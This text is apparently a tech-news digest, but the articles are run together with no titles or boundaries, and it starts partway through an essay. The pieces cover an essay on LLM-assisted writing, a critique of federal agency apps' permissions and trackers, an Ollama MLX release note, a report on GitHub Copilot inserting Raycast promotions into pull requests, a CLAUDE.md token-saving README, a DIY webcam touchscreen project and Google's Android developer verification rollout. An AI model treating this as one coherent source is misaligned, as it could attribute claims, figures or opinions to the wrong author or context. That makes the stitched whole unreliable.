The sec­ond or­der goal of writ­ing is to be­come more ca­pa­ble. It is like work­ing out. Every time you do a rep on the bound­ary of what you can do, you get stronger. It is un­com­fort­able and ef­fort­ful.

Letting an LLM write for you is like pay­ing some­body to work out for you.

There are so­cial ef­fects to LLM-generated writ­ing too. When I send some­body a doc­u­ment that whiffs of LLM, I’m only demon­strat­ing that the LLM pro­duced some­thing ap­prox­i­mat­ing what oth­ers want to hear. I’m not show­ing that I con­tended with the ideas.

It un­der­mines my cred­i­bil­ity as a per­son who could lead what­ever ini­tia­tive comes out of this doc­u­ment. That’s un­for­tu­nate. I could have used this op­por­tu­nity to es­tab­lish cred­i­bil­ity.

LLM-generated writ­ing un­der­mines the au­then­tic­ity of not just one’s writ­ing but of the think­ing be­hind it as well. If the prose is au­to­mat­i­cally gen­er­ated, might the ideas be too?

How LLMs can be used in the writ­ing process

LLMs are use­ful for re­search and check­ing your work. They can also work well for quickly record­ing in­for­ma­tion or tran­scrib­ing text (neither of which are what I mean by “writing”, as in “writing an es­say”).

They are par­tic­u­larly good at gen­er­at­ing ideas. They thrive in this use case be­cause if they gen­er­ate 10 things and only one is use­ful, no harm is done. You can take what is use­ful and leave the rest be­hind.

These LLMs will in­crease ef­fi­ciency in de­liv­er­ing soft­ware. But in or­der to make the most of them, we need a si­mul­ta­ne­ous rise in our level of thought­ful­ness.

The fed­eral gov­ern­ment re­leased an app yes­ter­day, March 27th, and it’s spy­ware.

The White House app mar­kets it­self as a way to get “unparalleled ac­cess” to the Trump ad­min­is­tra­tion, with press re­leases, livestreams, and pol­icy up­dates. The kind of con­tent that every RSS feed on the planet de­liv­ers with one per­mis­sion: net­work ac­cess. But the White House app, ver­sion 47.0.1 (because sub­tlety died a long time ago), re­quests pre­cise GPS lo­ca­tion, bio­met­ric fin­ger­print ac­cess, stor­age mod­i­fi­ca­tion, the abil­ity to run at startup, draw over other apps, view your Wi-Fi con­nec­tions, and read badge no­ti­fi­ca­tions. It also ships with 3 em­bed­ded track­ers in­clud­ing Huawei Mobile Services Core (yes, the Chinese com­pany the US gov­ern­ment sanc­tioned, ship­ping track­ing in­fra­struc­ture in­side the sit­ting pres­i­den­t’s of­fi­cial app), and it has an ICE tip line but­ton that redi­rects straight to ICE’s re­port­ing page.

This thing also has a “Text the President” but­ton that auto-fills your mes­sage with “Greatest President Ever!” and then col­lects your name and phone num­ber. There’s no spe­cific pri­vacy pol­icy for the app, just a generic white­house.gov pol­icy that does­n’t ad­dress any of the ap­p’s track­ing ca­pa­bil­i­ties.

The White House app might ac­tu­ally be one of the milder ones. I’ve been go­ing through every fed­eral agency app I can find on Google Play, pulling their per­mis­sions from Exodus Privacy (which au­dits Android APKs for track­ers and per­mis­sions), and what I found de­serves its own term. I’m call­ing it Fedware.

Ok so let me walk you through what the fed­eral gov­ern­ment is run­ning on your phone.

The FBI’s app, myFBI Dashboard, re­quests 12 per­mis­sions in­clud­ing stor­age mod­i­fi­ca­tion, Wi-Fi scan­ning, ac­count dis­cov­ery (it can see what ac­counts are on your de­vice), phone state read­ing, and auto-start at boot. It also con­tains 4 track­ers, one of which is Google AdMob, which means the FBI’s of­fi­cial app ships with an ad-serv­ing SDK while also read­ing your phone iden­tity. From what I found, the FBI’s news app has more track­ers em­bed­ded than most weather apps.

The FEMA app re­quests 28 per­mis­sions in­clud­ing pre­cise and ap­prox­i­mate lo­ca­tion, and has gone from 4 track­ers in older ver­sions down to 1 in v3.0.14. Twenty-eight per­mis­sions for an app whose pri­mary func­tion is show­ing you weather alerts and shel­ter lo­ca­tions. To put that in con­text, the AP News app de­liv­ers the same kind of dis­as­ter cov­er­age with a frac­tion of the per­mis­sions.

IRS2Go has 3 track­ers and 10 per­mis­sions in its lat­est ver­sion, and ac­cord­ing to a TIGTA au­dit, the IRS re­leased this app to the pub­lic be­fore the re­quired Privacy Impact Assessment was even signed, which vi­o­lated OMB Circular A-130. The app shares de­vice IDs, app ac­tiv­ity, and crash logs with third par­ties, and TIGTA found that the IRS never con­firmed that fil­ing sta­tus and re­fund amounts were masked and en­crypted in the app in­ter­face.

MyTSA comes in lighter with 9 per­mis­sions and 1 tracker, but still re­quests pre­cise and ap­prox­i­mate lo­ca­tion. The TSA’s own Privacy Impact Assessment says the app stores lo­ca­tion lo­cally and claims it never trans­mits GPS data to TSA. I’ll give them credit for doc­u­ment­ing that, be­cause most of these apps have pri­vacy poli­cies that read like ran­som notes.

CBP Mobile Passport Control is where things get gen­uinely alarm­ing. This one re­quests 14 per­mis­sions in­clud­ing 7 clas­si­fied as “dangerous”: back­ground lo­ca­tion track­ing (it fol­lows you even when the app is closed), cam­era ac­cess, bio­met­ric au­then­ti­ca­tion, and full ex­ter­nal stor­age read/​write. And the whole CBP ecosys­tem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a net­work that re­tains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.

The gov­ern­ment also built a fa­cial recog­ni­tion app called Mobile Fortify that ICE agents carry in the field. It draws from hun­dreds of mil­lions of im­ages across DHS, FBI, and State Department data­bases. ICE Homeland Security Investigations signed a $9.2 mil­lion con­tract with Clearview AI in September 2025, giv­ing agents ac­cess to over 50 bil­lion fa­cial im­ages scraped from the in­ter­net. DHS’s own in­ter­nal doc­u­ments ad­mit Mobile Fortify can be used to amass bi­o­graph­i­cal in­for­ma­tion of “individuals re­gard­less of cit­i­zen­ship or im­mi­gra­tion sta­tus”, and CBP con­firmed it will “retain all pho­tographs” in­clud­ing those of U. S. cit­i­zens, for 15 years.

Photos sub­mit­ted through CBP Home, bio­met­ric scans from Mobile Passport Control, and faces cap­tured by Mobile Fortify all feed this sys­tem. And the EFF found that ICE does not al­low peo­ple to opt out of be­ing scanned, and agents can use a fa­cial recog­ni­tion match to de­ter­mine your im­mi­gra­tion sta­tus even when other ev­i­dence con­tra­dicts it. A U. S.-born cit­i­zen was told he could be de­ported based on a bio­met­ric match alone.

SmartLINK is the ICE elec­tronic mon­i­tor­ing app, built by BI Incorporated, a sub­sidiary of the GEO Group (a pri­vate prison com­pany that prof­its di­rectly from how many peo­ple ICE mon­i­tors), un­der a $2.2 bil­lion con­tract. The app col­lects ge­olo­ca­tion, fa­cial im­ages, voice prints, med­ical in­for­ma­tion in­clud­ing preg­nancy data, and phone num­bers of your con­tacts. ICE’s con­tract gives them “unlimited rights to use, dis­pose of, or dis­close” all data col­lected. The ap­p’s for­mer terms of ser­vice al­lowed shar­ing “virtually any in­for­ma­tion col­lected through the ap­pli­ca­tion, even be­yond the scope of the mon­i­tor­ing plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these mon­i­tors to co­or­di­nate one of the largest im­mi­gra­tion raids in his­tory, ar­rest­ing around 700 peo­ple across six cities in Mississippi.

And if you think your lo­ca­tion data is safe be­cause you use reg­u­lar apps and avoid gov­ern­ment ones, the fed­eral gov­ern­ment is buy­ing that data too. Companies like Venntel col­lect 15 bil­lion lo­ca­tion points from over 250 mil­lion de­vices every day through SDKs em­bed­ded in over 80,000 apps (weather, nav­i­ga­tion, coupons, games). DHS, FBI, DOD, and the DEA pur­chase this data with­out war­rants, cre­at­ing a con­sti­tu­tional loop­hole around the Supreme Court’s 2018 Carpenter v. United States rul­ing that re­quires a war­rant for cell­phone lo­ca­tion his­tory. The Defense Department even pur­chased lo­ca­tion data from prayer apps to mon­i­tor Muslim com­mu­ni­ties. Police de­part­ments used sim­i­lar data to track racial jus­tice pro­test­ers.

And then there’s the IRS-ICE data shar­ing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding al­low­ing ICE to re­ceive names, ad­dresses, and tax data for peo­ple with re­moval or­ders. ICE sub­mit­ted 1.28 mil­lion names. The IRS er­ro­neously shared the data of thou­sands of peo­ple who should never have been in­cluded. The act­ing IRS Commissioner, Melanie Krause, re­signed in protest. The chief pri­vacy of­fi­cer quit. One per­son leav­ing changes noth­ing about the in­sti­tu­tion, and the data was al­ready out the door. A fed­eral judge blocked fur­ther shar­ing in November 2025, rul­ing it likely vi­o­lates IRS con­fi­den­tial­ity pro­tec­tions, but by then the IRS was al­ready build­ing an au­to­mated sys­tem to give ICE bulk ac­cess to home ad­dresses with min­i­mal hu­man over­sight. The court or­der is a speed bump, and they’ll find an­other route.

The apps, the data­bases, and the data bro­ker con­tracts all feed the same pipeline, and no sin­gle agency con­trols it be­cause they all share it.

The GAO re­ported in 2023 that nearly 60% of 236 pri­vacy and se­cu­rity rec­om­men­da­tions is­sued since 2010 had still not been im­ple­mented. Congress has been told twice, in 2013 and 2019, to pass com­pre­hen­sive in­ter­net pri­vacy leg­is­la­tion. It has done nei­ther. And it won’t, be­cause the sur­veil­lance ap­pa­ra­tus serves the peo­ple who run it, and the peo­ple who run it write the laws. Oversight is the­ater. The GAO is­sues a re­port, Congress holds a hear­ing, every­one per­forms con­cern for the cam­eras, and then the con­tracts get re­newed and the data keeps flow­ing. It’s work­ing ex­actly as de­signed.

The fed­eral gov­ern­ment pub­lishes con­tent avail­able through stan­dard web pro­to­cols and RSS feeds, then wraps that con­tent in ap­pli­ca­tions that de­mand ac­cess to your lo­ca­tion, bio­met­rics, stor­age, con­tacts, and de­vice iden­tity. They em­bed ad­ver­tis­ing track­ers in FBI apps. They sell the line that you need their app to re­ceive their pro­pa­ganda while the app qui­etly col­lects data that flows into the same sur­veil­lance pipeline feed­ing ICE raids and war­rant­less lo­ca­tion track­ing. Every sin­gle one of these apps could be re­placed by a web page, and they know that. The app ex­ists be­cause a web page can’t read your fin­ger­print, track your GPS in the back­ground, or in­ven­tory the other ac­counts on your de­vice.

You don’t need their app. You don’t need their per­mis­sion to ac­cess pub­lic in­for­ma­tion. You al­ready have a browser, an RSS reader, and the abil­ity to de­cide for your­self what runs on your own hard­ware. Use them.

Today, we’re pre­view­ing the fastest way to run Ollama on Apple sil­i­con, pow­ered by MLX, Apple’s ma­chine learn­ing frame­work.

This un­locks new per­for­mance to ac­cel­er­ate your most de­mand­ing work on ma­cOS:

* Coding agents like Claude Code, OpenCode, or Codex

Ollama on Apple sil­i­con is now built on top of Apple’s ma­chine learn­ing frame­work, MLX, to take ad­van­tage of its uni­fied mem­ory ar­chi­tec­ture.

This re­sults in a large speedup of Ollama on all Apple Silicon de­vices. On Apple’s M5, M5 Pro and M5 Max chips, Ollama lever­ages the new GPU Neural Accelerators to ac­cel­er­ate both time to first to­ken (TTFT) and gen­er­a­tion speed (tokens per sec­ond).

Testing was con­ducted on March 29, 2026, us­ing Alibaba’s Qwen3.5-35B-A3B model quan­tized to `NVFP4` and Ollama’s pre­vi­ous im­ple­men­ta­tion quan­tized to `Q4_K_M` us­ing Ollama 0.18. Ollama 0.19 will see even higher per­for­mance (1851 to­ken/​s pre­fill and 134 to­ken/​s de­code when run­ning with `int4`).

Ollama now lever­ages NVIDIA’s NVFP4 for­mat to main­tain model ac­cu­racy while re­duc­ing mem­ory band­width and stor­age re­quire­ments for in­fer­ence work­loads.

As more in­fer­ence providers scale in­fer­ence us­ing NVFP4 for­mat, this al­lows Ollama users to share the same re­sults as they would in a pro­duc­tion en­vi­ron­ment.

It fur­ther opens up Ollama to have the abil­ity to run mod­els op­ti­mized by NVIDIA’s model op­ti­mizer. Other pre­ci­sions will be made avail­able based on the de­sign and us­age in­tent from Ollama’s re­search and hard­ware part­ners.

Ollama’s cache has been up­graded to make cod­ing and agen­tic tasks more ef­fi­cient.

* Lower mem­ory uti­liza­tion: Ollama will now reuse its cache across con­ver­sa­tions, mean­ing less mem­ory uti­liza­tion and more cache hits when branch­ing when us­ing a shared sys­tem prompt with tools like Claude Code.

* Intelligent check­points: Ollama will now store snap­shots of its cache at in­tel­li­gent lo­ca­tions in the prompt, re­sult­ing in less prompt pro­cess­ing and faster re­sponses.

* Smarter evic­tion: shared pre­fixes sur­vive longer even when older branches are dropped.

This pre­view re­lease of Ollama ac­cel­er­ates the new Qwen3.5-35B-A3B model, with sam­pling pa­ra­me­ters tuned for cod­ing tasks.

Please make sure you have a Mac with more than 32GB of uni­fied mem­ory.

ol­lama launch claude –model qwen3.5:35b-a3b-cod­ing-nvfp4

ol­lama launch open­claw –model qwen3.5:35b-a3b-cod­ing-nvfp4

ol­lama run qwen3.5:35b-a3b-cod­ing-nvfp4

We are ac­tively work­ing to sup­port fu­ture mod­els. For users with cus­tom mod­els fine-tuned on sup­ported ar­chi­tec­tures, we will in­tro­duce an eas­ier way to im­port mod­els into Ollama. In the mean­time, we will ex­pand the list of sup­ported ar­chi­tec­tures.

Thank you to:

* The MLX con­trib­u­tor team who built an in­cred­i­ble ac­cel­er­a­tion frame­work

* The GGML & llama.cpp team who built a thriv­ing lo­cal frame­work and com­mu­nity

* The Alibaba Qwen team for open-sourc­ing ex­cel­lent mod­els and their col­lab­o­ra­tion

Updated Microsoft has done a 180. Following back­lash from de­vel­op­ers, GitHub has re­moved Copilot’s abil­ity to stick ads - what it calls “tips” - into any pull re­quest that in­vokes its name.

Australian de­vel­oper Zach Manson noted on Monday that, af­ter a coworker asked Copilot to cor­rect a typo in one of his pull re­quests, he was sur­prised to find a mes­sage from Copilot in the PR push­ing read­ers to adopt pro­duc­tiv­ity app Raycast.

“Quickly spin up Copilot cod­ing agents from any­where on your ma­cOS or Windows ma­chine with Raycast,” the note read with a light­ning bolt emoji and link to in­stall Raycast.

“Initially I thought there was some kind of train­ing data poi­son­ing or novel prompt in­jec­tion and the Raycast team was do­ing some elab­o­rate proof of con­cept mar­ket­ing,” Manson told The Register in an email.

But no: Take a look around GitHub and you’ll see more than 11,400 PRs with the same tip in them, all seem­ingly added by Copilot. Take a look at the PRs’ code it­self and search for the block in­vok­ing Copilot to add a tip and you’ll find plenty more ex­am­ples of dif­fer­ent tips be­ing in­serted by Copilot.

Manson told us that he’s not sur­prised to see GitHub do­ing this with an AI model, but he said it’s pretty of­fen­sive to see the Raycast ad in­serted by Copilot into his own PR like he wrote it.

“I was­n’t even aware that the GitHub Copilot Review in­te­gra­tion had the abil­ity to edit other users’ de­scrip­tions and com­ments,” Manson told us. “I can’t think of a valid use case for that abil­ity.”

It was only Monday morn­ing when Microsoft watch­ers at Neowin picked up Manson’s re­port that Copilot was in­ject­ing what de­vel­op­ers saw as ads into PRs, and, by the af­ter­noon, GitHub had de­cided a re­cent change to Copilot may have gone a bit too far.

GitHub VP of de­vel­oper re­la­tions Martin Woodward ex­plained in a post on X later in the day Monday that Copilot in­sert­ing ads into PRs is­n’t ac­tu­ally new be­hav­ior - it’s been do­ing so in the ones it cre­ates for a while. Letting Copilot touch PRs it did­n’t cre­ate, but is men­tioned in, on the other hand, is new be­hav­ior that has­n’t re­ally worked out.

“[When] we added the abil­ity to have Copilot work on any PR by men­tion­ing it the be­hav­iour be­came icky,” Woodward said.

Tim Rogers, prin­ci­pal prod­uct man­ager for Copilot at GitHub, took to Hacker News on Monday to say that giv­ing Copilot the abil­ity to add “tips” to PRs was in­tended “to help de­vel­op­ers learn new ways to use the agent in their work­flow.”

Hearing feed­back from the com­mu­nity fol­low­ing Manson’s post and the ker­fuf­fle it gen­er­ated, Rogers said, has helped him re­al­ize that “on re­flec­tion,” let­ting Copilot make changes to PRs writ­ten by a hu­man with­out their knowl­edge “was the wrong judge­ment call.”

“We’ve now dis­abled these tips in pull re­quests cre­ated by or touched by Copilot, so you won’t see this hap­pen again,” Rogers added. ®

Martin Woodward, VP of Developer Relations, GitHub, said in a state­ment: “GitHub does not and does not plan to in­clude ad­ver­tise­ments in GitHub. We iden­ti­fied a pro­gram­ming logic is­sue with a GitHub Copilot cod­ing agent tip that sur­faced in the wrong con­text within a pull re­quest com­ment. We have re­moved agent tips from pull re­quest com­ments mov­ing for­ward.”

One file. Drop it in your pro­ject. Cuts Claude out­put ver­bosity by ~63%. No code changes re­quired. Note: most Claude costs come from in­put to­kens, not out­put. This file tar­gets out­put be­hav­ior - syco­phancy, ver­bosity, for­mat­ting noise. It won’t fix your biggest bill but it will fix your most an­noy­ing re­sponses. Model sup­port: bench­marks were run on Claude only. The rules are model-ag­nos­tic and should work on any model that reads con­text - but re­sults on lo­cal mod­els like llama.cpp, Mistral, or oth­ers are untested. Community re­sults wel­come.

When you use Claude Code, every word Claude gen­er­ates costs to­kens. Most peo­ple never con­trol how Claude re­sponds - they just get what­ever the model de­cides to out­put.

* Opens every re­sponse with “Sure!”, “Great ques­tion!”, “Absolutely!”

* Ends with “I hope this helps! Let me know if you need any­thing!”

* Restates your ques­tion be­fore an­swer­ing it

* Adds un­so­licited sug­ges­tions be­yond what you asked

* Over-engineers code with ab­strac­tions you never re­quested

All of this wastes to­kens. None of it adds value.

Drop CLAUDE.md into your pro­ject root. Claude Code reads it au­to­mat­i­cally. Behavior changes im­me­di­ately.

This file works best for:

* Repeated struc­tured tasks where Claude’s de­fault ver­bosity com­pounds across hun­dreds of calls

* Teams who need con­sis­tent, parseable out­put for­mat across ses­sions

This file is not worth it for:

* Single short queries - the file loads into con­text on every mes­sage, so on low-out­put ex­changes it is a net to­ken in­crease

* Casual one-off use - the over­head does­n’t pay off at low vol­ume

* Fixing deep fail­ure modes like hal­lu­ci­nated im­ple­men­ta­tions or ar­chi­tec­tural drift - those re­quire hooks, gates, and me­chan­i­cal en­force­ment

* Pipelines us­ing mul­ti­ple fresh ses­sions per task - fresh ses­sions don’t carry the CLAUDE.md over­head ben­e­fit the same way per­sis­tent ses­sions do

* Parser re­li­a­bil­ity at scale - if you need guar­an­teed parseable out­put, use struc­tured out­puts (JSON mode, tool use with schemas) built into the API - that is a more ro­bust so­lu­tion than prompt-based for­mat­ting rules

* Exploratory or ar­chi­tec­tural work where de­bate, push­back, and al­ter­na­tives are the point - the over­ride rule lets you ask for that any time, but if that’s your pri­mary work­flow this file will feel re­stric­tive

The hon­est trade-off:

The CLAUDE.md file it­self con­sumes in­put to­kens on every mes­sage. The sav­ings come from re­duced out­put to­kens. The net is only pos­i­tive when out­put vol­ume is high enough to off­set the per­sis­tent in­put cost. At low us­age it costs more than it saves.

Same 5 prompts. Run with­out CLAUDE.md (baseline) then with CLAUDE.md (optimized).

~295 words saved per 4 prompts. Same in­for­ma­tion. Zero sig­nal loss.

Methodology note: This is a 5-prompt di­rec­tional in­di­ca­tor (T1-T3, T5 for word re­duc­tion; T4 is a for­mat test), not a sta­tis­ti­cally con­trolled study. Claude’s out­put length varies nat­u­rally be­tween iden­ti­cal prompts. No vari­ance con­trols or re­peated runs were ap­plied. Treat the 63% as a di­rec­tional sig­nal for out­put-heavy use cases, not a pre­cise uni­ver­sal mea­sure­ment. The CLAUDE.md file it­self adds in­put to­kens on every mes­sage - net sav­ings only ap­ply when out­put vol­ume is high enough to off­set that per­sis­tent cost.

Scope rules to your ac­tual fail­ure modes, not generic ones.

Generic rules like “be con­cise” help but the real wins come from tar­get­ing spe­cific fail­ures you’ve ac­tu­ally hit. For ex­am­ple if Claude silently swal­lows er­rors in your pipeline, add a rule like: “when a step fails, stop im­me­di­ately and re­port the full er­ror with trace­back be­fore at­tempt­ing any fix.” Specific beats generic every time.

CLAUDE.md files com­pose - use that.

Claude reads mul­ti­ple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), pro­ject-level, and sub­di­rec­tory-level. This means:

* Keep gen­eral pref­er­ences (tone, for­mat, ASCII rules) in your global file

* Keep pro­ject-spe­cific con­straints (“never mod­ify /config with­out con­fir­ma­tion”) at the pro­ject level

This avoids bloat­ing any sin­gle file and keeps rules close to where they ap­ply.

Different pro­ject types need dif­fer­ent lev­els of com­pres­sion. Pick the base file + a pro­file, or use the base alone.

curl -o CLAUDE.md https://​raw.githubuser­con­tent.com/​dron­a23/​claude-to­ken-ef­fi­cient/​main/​CLAUDE.md

git clone https://​github.com/​dron­a23/​claude-to­ken-ef­fi­cient

cp claude-to­ken-ef­fi­cient/​pro­files/​CLAUDE.cod­ing.md your-pro­ject/​CLAUDE.md

Option 3 - Manual:

Copy the con­tents of CLAUDE.md from this repo into your pro­ject root.

User in­struc­tions al­ways win. If you ex­plic­itly ask for a de­tailed ex­pla­na­tion or ver­bose out­put, Claude will fol­low your in­struc­tion - the file never fights you.

Found a be­hav­ior that CLAUDE.md can fix? Open an is­sue with:

The an­noy­ing be­hav­ior (what Claude does by de­fault)

The prompt that trig­gers it

Community sub­mis­sions be­come part of the next ver­sion with full credit.

This pro­ject was built on real com­plaints from the Claude com­mu­nity. Full credit to every source that con­tributed a fix:

MIT - free to use, mod­ify, and dis­trib­ute.

Built by Drona Gangarapu - open to PRs, is­sues, and pro­file con­tri­bu­tions.

We turned a MacBook into a touch­screen us­ing only $1 of hard­ware and a lit­tle bit of com­puter vi­sion. The proof-of-con­cept, dubbed “Project Sistine” af­ter our recre­ation of the fa­mous paint­ing in the Sistine Chapel, was pro­to­typed by me, Kevin, Guillermo, and Logan in about 16 hours.

The ba­sic prin­ci­ple be­hind Sistine is sim­ple. Surfaces viewed from an an­gle tend to look shiny, and you can tell if a fin­ger is touch­ing the sur­face by check­ing if it’s touch­ing its own re­flec­tion.

Kevin, back in mid­dle school, no­ticed this phe­nom­e­non and built ShinyTouch, uti­liz­ing an ex­ter­nal we­b­cam to build a touch in­put sys­tem re­quir­ing vir­tu­ally no setup. We wanted to see if we could minia­tur­ize the idea and make it work with­out an ex­ter­nal we­b­cam. Our idea was to retro­fit a small mir­ror in front of a MacBook’s built-in we­b­cam, so that the we­b­cam would be look­ing down at the com­puter screen at a sharp an­gle. The cam­era would be able to see fin­gers hov­er­ing over or touch­ing the screen, and we’d be able to trans­late the video feed into touch events us­ing com­puter vi­sion.

Our hard­ware setup was sim­ple. All we needed was to po­si­tion a mir­ror at the ap­pro­pri­ate an­gle in front of the we­b­cam. Here is our bill of ma­te­ri­als:

After some it­er­a­tion, we set­tled on a de­sign that could be as­sem­bled in min­utes us­ing a knife and a hot glue gun.

The first step in pro­cess­ing video frames is de­tect­ing the fin­ger. Here’s a typ­i­cal ex­am­ple of what the we­b­cam sees:

The fin­ger de­tec­tion al­go­rithm needs to find the touch/​hover point for fur­ther pro­cess­ing. Our cur­rent ap­proach uses clas­si­cal com­puter vi­sion tech­niques. The pro­cess­ing pipeline con­sists of the fol­low­ing steps:

Find the two largest con­tours and en­sure that the con­tours over­lap in the

hor­i­zon­tal di­rec­tion and the smaller one is above the larger one

Identify the touch/​hover point as the mid­point of the line con­nect­ing the

top of the bot­tom con­tour and the bot­tom of the top con­tour

Distinguish be­tween touch and hover based on the ver­ti­cal dis­tance be­tween

the two con­tours

Shown above is the re­sult of ap­ply­ing this process to a frame from the we­b­cam. The fin­ger and re­flec­tion (contours) are out­lined in green, the bound­ing box is shown in red, and the touch point is shown in ma­genta.

The fi­nal step in pro­cess­ing the in­put is map­ping the touch/​hover point from we­b­cam co­or­di­nates to on-screen co­or­di­nates. The two are re­lated by a

ho­mog­ra­phy. We com­pute the ho­mog­ra­phy ma­trix through a cal­i­bra­tion process where the user is prompted to touch spe­cific points on the screen. After we col­lect data match­ing we­b­cam co­or­di­nates with on-screen co­or­di­nates, we can es­ti­mate the ho­mog­ra­phy ro­bustly us­ing RANSAC. This gives us a pro­jec­tion ma­trix that maps we­b­cam co­or­di­nates to on-screen co­or­di­nates.

The video above demon­strates the cal­i­bra­tion process, where the user has to fol­low a green dot around the screen. The video in­cludes some de­bug in­for­ma­tion, over­laid on live video from the we­b­cam. The touch point in we­b­cam co­or­di­nates is shown in ma­genta. After the cal­i­bra­tion process is com­plete, the pro­jec­tion ma­trix is vi­su­al­ized with red lines, and the soft­ware switches to a mode where the es­ti­mated touch point is shown as a blue dot.

In the cur­rent pro­to­type, we trans­late hover and touch into mouse events, mak­ing ex­ist­ing ap­pli­ca­tions in­stantly touch-en­abled.

If we were writ­ing our own touch-en­abled apps, we could di­rectly make use of touch data, in­clud­ing in­for­ma­tion such as hover height.

Project Sistine is a proof-of-con­cept that turns a lap­top into a touch­screen us­ing only $1 of hard­ware, and for a pro­to­type, it works pretty well! With some sim­ple mod­i­fi­ca­tions such as a higher res­o­lu­tion we­b­cam (ours was 480p) and a curved mir­ror that al­lows the we­b­cam to cap­ture the en­tire screen, Sistine could be­come a prac­ti­cal low-cost touch­screen sys­tem.

Our Sistine pro­to­type is open source, re­leased un­der the MIT License.

The lat­est Android and Google Play news for app and game

de­vel­op­ers.

Android de­vel­oper ver­i­fi­ca­tion: Rolling out to all de­vel­op­ers on Play Console and Android Developer Console

Android is for every­one. It’s built on a com­mit­ment to an open and safe plat­form. Users should feel con­fi­dent in­stalling apps, no mat­ter where they get them from. However, our re­cent analy­sis found over 90 times more mal­ware from side­loaded sources than on Google Play. So as an ex­tra layer of se­cu­rity, we are rolling out Android de­vel­oper ver­i­fi­ca­tion to help pre­vent ma­li­cious ac­tors from hid­ing be­hind anonymity to re­peat­edly spread harm. Over the past sev­eral months, we’ve worked closely with the com­mu­nity to im­prove the de­sign so we ac­count for the many ways peo­ple use Android to bal­ance open­ness with safety.

Today, we’re start­ing to roll out Android de­vel­oper ver­i­fi­ca­tion to all de­vel­op­ers in both the new Android Developer Console and Play Console. This al­lows you to com­plete your ver­i­fi­ca­tion and reg­is­ter your apps be­fore user-fac­ing changes be­gin later this year.

If you only dis­trib­ute apps out­side of Google Play, you can cre­ate an ac­count in Android Developer Console to­day.

If you’re on Google Play, check your Play Console ac­count for up­dates over the next few weeks. If you’ve al­ready ver­i­fied your iden­tity here, then you’re likely al­ready set.

Most of your users’ down­load ex­pe­ri­ence will not change at all

While ver­i­fi­ca­tion tools are rolling out now, the ex­pe­ri­ence for users down­load­ing your apps will not change un­til later this year. The user side pro­tec­tions will first go live in Brazil, Indonesia, Singapore, and Thailand this September, be­fore ex­pand­ing glob­ally in 2027. We’ve shared this time­line early to en­sure you have am­ple time to com­plete your ver­i­fi­ca­tion.

Following this dead­line, for the vast ma­jor­ity of users, the ex­pe­ri­ence of in­stalling apps will stay ex­actly the same. It’s only when a user tries to in­stall an un­reg­is­tered app that they’ll re­quire ADB or ad­vanced flow, help­ing us keep the broader com­mu­nity safe while pre­serv­ing the flex­i­bil­ity for our power users.

Developers can still choose where to dis­trib­ute their apps. Most users’ down­load ex­pe­ri­ence will not change

Tailoring the ver­i­fi­ca­tion ex­pe­ri­ence to your feed­back

To bal­ance the need for safety with our com­mit­ment to open­ness, we’ve im­proved the ver­i­fi­ca­tion ex­pe­ri­ence based on your feed­back. We’ve stream­lined the de­vel­oper ex­pe­ri­ence to be more in­te­grated with ex­ist­ing work­flows and main­tained choice for power users.

For Android Studio de­vel­op­ers: In the next two months, you’ll see your ap­p’s reg­is­tra­tion sta­tus right in Android Studio when you gen­er­ate a signed App Bundle or APK.

You’ll see your ap­p’s reg­is­tra­tion sta­tus in Android Studio when you gen­er­ate a signed App Bundle or APK.

For Play de­vel­op­ers: If you’ve com­pleted Play Console’s de­vel­oper ver­i­fi­ca­tion re­quire­ments, your iden­tity is al­ready ver­i­fied and we’ll au­to­mat­i­cally reg­is­ter el­i­gi­ble Play apps for you. In the rare case that we are un­able to reg­is­ter your apps for you, you will need to fol­low the man­ual app claim process. Over the next cou­ple of weeks, more de­tails will be pro­vided in the Play Console and through email. Also, you’ll be able to reg­is­ter apps you dis­trib­ute out­side of Play in the Play Console too.

The Android de­vel­oper ver­i­fi­ca­tion page in your Play Console will show the reg­is­tra­tion sta­tus for each of your apps.

For stu­dents and hob­by­ists: To keep Android ac­ces­si­ble to every­one, we’re build­ing a free, no gov­ern­ment ID re­quired, lim­ited dis­tri­b­u­tion ac­count so you can share your work with up to 20 de­vices. You only need an email ac­count to get started. Sign up for early ac­cess. We’ll send in­vites in June.

For power users: We are main­tain­ing the choice to in­stall apps from any source. You can use the new ad­vanced flow for side­load­ing un­reg­is­tered apps or con­tinue us­ing ADB. This main­tains choice while pro­tect­ing vul­ner­a­ble users.

We’re rolling this out care­fully and work­ing closely with de­vel­op­ers, users, and our part­ners. In April, we’ll in­tro­duce Android Developer Verifier, a new Google sys­tem ser­vice that will be used to check if an app is reg­is­tered to a ver­i­fied de­vel­oper.

April 2026: Users will start to see Android Developer Verifier in their Google Systems ser­vices set­tings.

September 30, 2026: Apps must be reg­is­tered by ver­i­fied de­vel­op­ers in or­der to be in­stalled and up­dated on cer­ti­fied Android de­vices in Brazil, Indonesia, Singapore, and Thailand. Unregistered apps can be side­loaded with ADB or ad­vanced flow.

2027 and be­yond: We will roll out this re­quire­ment glob­ally.

We’re com­mit­ted to an Android that is both open and safe. Check out our de­vel­oper guides to get started to­day.